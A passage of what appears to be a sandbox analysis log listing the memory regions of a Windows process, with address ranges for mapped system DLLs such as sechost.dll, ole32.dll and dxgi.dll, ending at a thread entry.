Region: id = 38858 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 38859 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38860 start_va = 0x74620000 end_va = 0x7471afff entry_point = 0x74620000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 38861 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38862 start_va = 0x71040000 end_va = 0x7106bfff entry_point = 0x71040000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 38863 start_va = 0x71000000 end_va = 0x71039fff entry_point = 0x71000000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 38866 start_va = 0x70f70000 end_va = 0x70ff2fff entry_point = 0x70f70000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Thread: id = 1228 os_tid = 0x4ac